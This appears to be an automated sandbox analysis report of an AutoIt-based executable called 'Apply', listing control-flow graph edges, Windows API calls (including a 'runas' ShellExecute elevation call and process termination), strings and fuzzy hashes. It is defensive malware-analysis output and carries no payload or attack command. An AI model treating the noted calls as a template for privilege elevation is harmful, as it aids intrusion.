1220->1233 1234 8a88d1-8a88d5 1220->1234 1241 8a8619-8a8636 call 85d530 1226->1241 1242 8a899c-8a89aa 1226->1242 1227->1185 1264 8a86a6-8a86b8 call 86b46f 1227->1264 1276 8a8977-8a8980 call 85b81d 1228->1276 1277 8a8955-8a895d 1228->1277 1265 8a85cf-8a85d8 call 857e30 1231->1265 1266 8a85c0-8a85cd call 857e30 1231->1266 1233->1219 1283 8a89cd-8a89db 1233->1283 1234->1233 1251 8a88d7-8a88db 1234->1251 1284 8a857c-8a8585 call 85b81d 1235->1284 1285 86b08b-86b097 1235->1285 1257 8a880b-8a8811 1238->1257 1239->1257 1241->1185 1287 8a863c-8a864e call 86b46f 1241->1287 1248 8a89af-8a89bf 1242->1248 1249 8a89ac 1242->1249 1267 8a89c1 1248->1267 1268 8a89c4-8a89c8 1248->1268 1249->1248 1269 8a8963-8a8965 1251->1269 1257->1185 1297 8a855f-8a856d call 857e30 1258->1297 1298 8a8554-8a855d call 85b81d 1258->1298 1302 8a87a0 1261->1302 1303 8a8791-8a879e call 85b81d 1261->1303 1264->1185 1305 8a86be-8a86c7 call 86b46f 1264->1305 1306 8a85db-8a85e6 call 857467 1265->1306 1266->1306 1267->1268 1268->1199 1269->1185 1272->1185 1276->1272 1288 8a896a-8a8975 call 85a344 1277->1288 1289 8a895f 1277->1289 1294 8a89dd 1283->1294 1295 8a89e0-8a89e3 1283->1295 1284->1184 1285->1185 1318 8a8650-8a865f call 85b81d 1287->1318 1319 8a8661 1287->1319 1288->1276 1288->1283 1289->1269 1294->1295 1295->1143 1326 8a8570-8a8577 1297->1326 1298->1326 1313 8a87a4-8a87ab 1302->1313 1303->1313 1331 8a86da 1305->1331 1332 8a86c9-8a86d8 call 85b81d 1305->1332 1306->1185 1321 8a87ad-8a87b2 call 853989 1313->1321 1322 8a87b7 call 852f14 1313->1322 1328 8a8665-8a8670 call 879314 1318->1328 1319->1328 1321->1185 1330 8a87bc 1322->1330 1326->1185 1328->1134 1342 8a8676-8a867c 1328->1342 1330->1185 1337 8a86de-8a8701 1331->1337 1332->1337 1340 8a870f-8a8712 1337->1340 1341 8a8703-8a870a 1337->1341 1343 8a8722-8a8725 1340->1343 1344 8a8714-8a871d 1340->1344 1341->1340 1342->1185 1345 8a8727-8a8730 1343->1345 1346 8a8735-8a8738 1343->1346 1344->1343 1345->1346 1346->1185 1347 8a873e-8a874c 1346->1347 1347->1185
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                    • API String ID: 0-4285391669
                                                    • Opcode ID: 1b6c9e3d0141e99f198305f18caf7cbf311de5d96ab237be34f32786fe66f1bd
                                                    • Instruction ID: ae5bcc4da46802567441c07eab02dd1a8a626241571f6852d0150cfb700df3c4
                                                    • Opcode Fuzzy Hash: 1b6c9e3d0141e99f198305f18caf7cbf311de5d96ab237be34f32786fe66f1bd
                                                    • Instruction Fuzzy Hash: F4622774508381DFD728DF15C084AAABBE0FF89308F14896EE999CB351DB719949CF92

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1384 85294b-8529bb CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00852979
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0085299A
                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00851727,?), ref: 008529AE
                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00851727,?), ref: 008529B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: b09d56d94e7cb6eaa42741f4922a3211aa5efb22587111613644cd33ba96e580
                                                    • Instruction ID: b5806c4620e3b6a6a90bd476bebd3fc9c247ff50945be810999e51cfd9f31b3b
                                                    • Opcode Fuzzy Hash: b09d56d94e7cb6eaa42741f4922a3211aa5efb22587111613644cd33ba96e580
                                                    • Instruction Fuzzy Hash: 61F0FE715543D0BAEB3197276C48E373EBDE7CBF50F00001EB904A6170D5691856EAB0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1385 8d10b7-8d10ca 1386 8d10cc-8d10e0 call 8c25a5 IsWindow 1385->1386 1387 8d10ef GetForegroundWindow 1385->1387 1386->1387 1393 8d10e2-8d10ed call 8c25a5 1386->1393 1389 8d10f5-8d117b call 85b81d * 2 call 8cec5d GetDC GetPixel call 85d530 ReleaseDC 1387->1389 1393->1389
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 008D10D8
                                                    • GetForegroundWindow.USER32 ref: 008D10EF
                                                    • GetDC.USER32(00000000), ref: 008D112B
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 008D1137
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 008D116F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: 39a723e31f904f5bdfbcb8436c167253f7b4b263da9ec12039f5ac2603a97d60
                                                    • Instruction ID: 851504aa703ca4bda9a0dbe096fd64d16a6bb1c64351fd3775f382a5cc0f601b
                                                    • Opcode Fuzzy Hash: 39a723e31f904f5bdfbcb8436c167253f7b4b263da9ec12039f5ac2603a97d60
                                                    • Instruction Fuzzy Hash: EE216235600214AFDB04EF69C899E5A77F5FF58341B04806DE85AD7351DB30AD44CB50
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008942BC
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00855123
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                    • String ID: Line %d: $AutoIt -
                                                    • API String ID: 2289894680-4094128768
                                                    • Opcode ID: 09f7c8c03cfd25a723a4ba0e70bfba6379d06ad76479bd5ce713890d2c96cddc
                                                    • Instruction ID: 82cdeacd934d907b903a390966b8bf22bcf40659380f57bc68d6a011a4b0edb5
                                                    • Opcode Fuzzy Hash: 09f7c8c03cfd25a723a4ba0e70bfba6379d06ad76479bd5ce713890d2c96cddc
                                                    • Instruction Fuzzy Hash: 6841A171408704AAC721EB64DC91EDF7BD8FF94725F144A1AF888D2191EB349A4E8793
                                                    APIs
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00852853
                                                      • Part of subcall function 00853DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00853DEF
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00913204), ref: 00892FC3
                                                    • ShellExecuteW.SHELL32(00000000,?,?,00913204), ref: 00892FCA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                    • String ID: runas
                                                    • API String ID: 448630720-4000483414
                                                    • Opcode ID: d3484d12a974a4c12940daf423f8656649aeca0538982a8aa0028ddbadb6a2a2
                                                    • Instruction ID: cc67cb48c064c90f25ae4d0a0eed7902ca8e35e532cdfce2f829f8536b0f76eb
                                                    • Opcode Fuzzy Hash: d3484d12a974a4c12940daf423f8656649aeca0538982a8aa0028ddbadb6a2a2
                                                    • Instruction Fuzzy Hash: 5111B4316083446BCB14FB68E8919AEBBA4FFD171AF40052DBD42D60A2DE35498DD793
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00854667,SwapMouseButtons,00000004,?), ref: 00854698
                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00854667,SwapMouseButtons,00000004,?), ref: 008546B9
                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00854667,SwapMouseButtons,00000004,?), ref: 008546DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: da6d652ed86f1e29aa95009cdc77bfab9fc9ad31cdc2cfd77c98bf016e1de284
                                                    • Instruction ID: ecd1345804c1ccd3e07821c0b1f7a567c9bf7c064427d2967cb84c9ad5243bc8
                                                    • Opcode Fuzzy Hash: da6d652ed86f1e29aa95009cdc77bfab9fc9ad31cdc2cfd77c98bf016e1de284
                                                    • Instruction Fuzzy Hash: B0115A75511218FFEB208F68CC84EEF7BF8FF11749B105459B801D7110D2719E98AB60
                                                    Strings
                                                    • Variable must be of type 'Object'., xrefs: 008A384D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Variable must be of type 'Object'.
                                                    • API String ID: 0-109567571
                                                    • Opcode ID: 969cacfd03690b6d0fb9aba09755befd2a7b7f447ec855c8b56365cc30e51dea
                                                    • Instruction ID: 8dd4f6b037584465efa7753cf0f1cd8c346667e76bc42073b067c3cf1627a4ad
                                                    • Opcode Fuzzy Hash: 969cacfd03690b6d0fb9aba09755befd2a7b7f447ec855c8b56365cc30e51dea
                                                    • Instruction Fuzzy Hash: 77C2A771E00218CFDB28CF58C880AADB7B1FF19315F648169E909EB291D774EE45CB91
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 0086F7CD
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0086F7E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 467f6afc8cfb1737b9996f0de6501ae80c9fd0ba88693d46e2696d74637d2846
                                                    • Instruction ID: 36630ca755e04441b2d74ecabe16ea90b5d6a05f934c73c51c423f57a5226ba0
                                                    • Opcode Fuzzy Hash: 467f6afc8cfb1737b9996f0de6501ae80c9fd0ba88693d46e2696d74637d2846
                                                    • Instruction Fuzzy Hash: 30515B724187449BD320AF18E885BAFBBF8FB84315F81885DF5D881192EB31946CC727
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 008709B8
                                                      • Part of subcall function 008735F4: RaiseException.KERNEL32(?,?,?,008709DA,?,00000000,?,?,?,?,?,?,008709DA,00000000,00919728,00000000), ref: 00873654
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 008709D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                    • String ID: Unknown exception
                                                    • API String ID: 3476068407-410509341
                                                    • Opcode ID: c2e244d2a76f8f8d6469f3c0a9a1502019cf9d0ce642ec951bb4b82a60e3f528
                                                    • Instruction ID: 24833101a1b56f1344084cc2d1154bccfb6f3f17e038c287b409bb92a386cf8c
                                                    • Opcode Fuzzy Hash: c2e244d2a76f8f8d6469f3c0a9a1502019cf9d0ce642ec951bb4b82a60e3f528
                                                    • Instruction Fuzzy Hash: 0DF0443490020DE78B00BAA8D856A9DBB6CFA00354B90C160BA1CD54EAEB71DA55D992
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008D8A7C
                                                    • TerminateProcess.KERNEL32(00000000), ref: 008D8A83
                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 008D8C64
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                    • String ID:
                                                    • API String ID: 146820519-0
                                                    • Opcode ID: c07879a0c2c180f95ced5bd55d687fa7e37b28db1203d8533e5fcbb98d9176f9
                                                    • Instruction ID: 595b592f2cd4daadb4f29a6d27edf4f4085d4c087ab5165248e06305475fc5d2
                                                    • Opcode Fuzzy Hash: c07879a0c2c180f95ced5bd55d687fa7e37b28db1203d8533e5fcbb98d9176f9
                                                    • Instruction Fuzzy Hash: 98124A71908341DFC714DF28C485A6ABBE5FF85328F148A5EE889CB352DB31E945CB92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_strcat
                                                    • String ID:
                                                    • API String ID: 306214811-0
                                                    • Opcode ID: 3a7425d39ba391d8b384787b7627013b035602d4eff73b072cbd545b3e3ff989
                                                    • Instruction ID: fe3b7279fa2d50b49dcfecbd6c86b29c8a90fbc09d0165a7e3e243471e58aa46
                                                    • Opcode Fuzzy Hash: 3a7425d39ba391d8b384787b7627013b035602d4eff73b072cbd545b3e3ff989
                                                    • Instruction Fuzzy Hash: 47A17A31604619EFCB18DF18C591969BBA1FF45318B2081AEE84ADF392DB31ED46CF81
                                                    APIs
                                                      • Part of subcall function 00852A8D: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00852ABE
                                                      • Part of subcall function 00852A8D: MapVirtualKeyW.USER32(00000010,00000000), ref: 00852AC6
                                                      • Part of subcall function 00852A8D: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00852AD1
                                                      • Part of subcall function 00852A8D: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00852ADC
                                                      • Part of subcall function 00852A8D: MapVirtualKeyW.USER32(00000011,00000000), ref: 00852AE4
                                                      • Part of subcall function 00852A8D: MapVirtualKeyW.USER32(00000012,00000000), ref: 00852AEC
                                                      • Part of subcall function 00852AF5: RegisterWindowMessageW.USER32(00000004,?,00852E40), ref: 00852B4D
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00852EE6
                                                    • OleInitialize.OLE32 ref: 00852F04
                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00893018
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID:
                                                    • API String ID: 1986988660-0
                                                    • Opcode ID: 8f867583d85e405f21954c28c4af865c2ffde3888a5579e1cd8daf14e72c05a3
                                                    • Instruction ID: 22edfd454c44498c2143a775e575e589c4809ffceebc1f63ffed53b79ab7215e
                                                    • Opcode Fuzzy Hash: 8f867583d85e405f21954c28c4af865c2ffde3888a5579e1cd8daf14e72c05a3
                                                    • Instruction Fuzzy Hash: 1671B4B0929340AFC7A8EF7DAD65A143BE0FB49305340822EE508CB275EB34854AEF51
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 30a689ff0f6c6c2f7fa6ae80a0ed2de04e6395842d56e492d41415f56c10a2a8
                                                    • Instruction ID: a9a4b10ef70d439632d1d6ec129738a6cd31a8d040644950f7210bcbe32eae8b
                                                    • Opcode Fuzzy Hash: 30a689ff0f6c6c2f7fa6ae80a0ed2de04e6395842d56e492d41415f56c10a2a8
                                                    • Instruction Fuzzy Hash: 123104369002259BCF24BB6898859BAB7ACFF44760B644559FE05DB640EF31AE438390
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001,?,00000000), ref: 00855C4E
                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00855C5E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 2730e45488588a7133ca806e6e516ba77b2c4565188c15cfa19cd5de09119485
                                                    • Instruction ID: 0a762891619e4ae1a03a826cf327215661eebde2129fac63c6ddc8abfd2a72ee
                                                    • Opcode Fuzzy Hash: 2730e45488588a7133ca806e6e516ba77b2c4565188c15cfa19cd5de09119485
                                                    • Instruction Fuzzy Hash: 8C316A31A00A0AEFDB14CF28C890B99B7B4FB44715F14862AED14E7640C7B1FE98CB91
                                                    APIs
                                                      • Part of subcall function 00855033: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00855123
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0086FCFC
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0086FD0B
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008AFBCA
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer$Kill
                                                    • String ID:
                                                    • API String ID: 3500052701-0
                                                    • Opcode ID: 7faef4c7b89cbe207bb1ea3fd8be1a0a5f6499b69410ffcb531c42426fe9ac33
                                                    • Instruction ID: 038ad72852163e661c4d8078fbe4301a54bad635e51a34bf0adf561188ca4fd9
                                                    • Opcode Fuzzy Hash: 7faef4c7b89cbe207bb1ea3fd8be1a0a5f6499b69410ffcb531c42426fe9ac33
                                                    • Instruction Fuzzy Hash: 3831B670904354AFEB32CF64C895BE6BBFCFB06718F14049AD68AD7242C3745A86CB11
                                                    APIs
                                                    • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0088891C,?,00919CB8,0000000C), ref: 00888A54
                                                    • GetLastError.KERNEL32(?,0088891C,?,00919CB8,0000000C), ref: 00888A5E
                                                    • __dosmaperr.LIBCMT ref: 00888A89
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
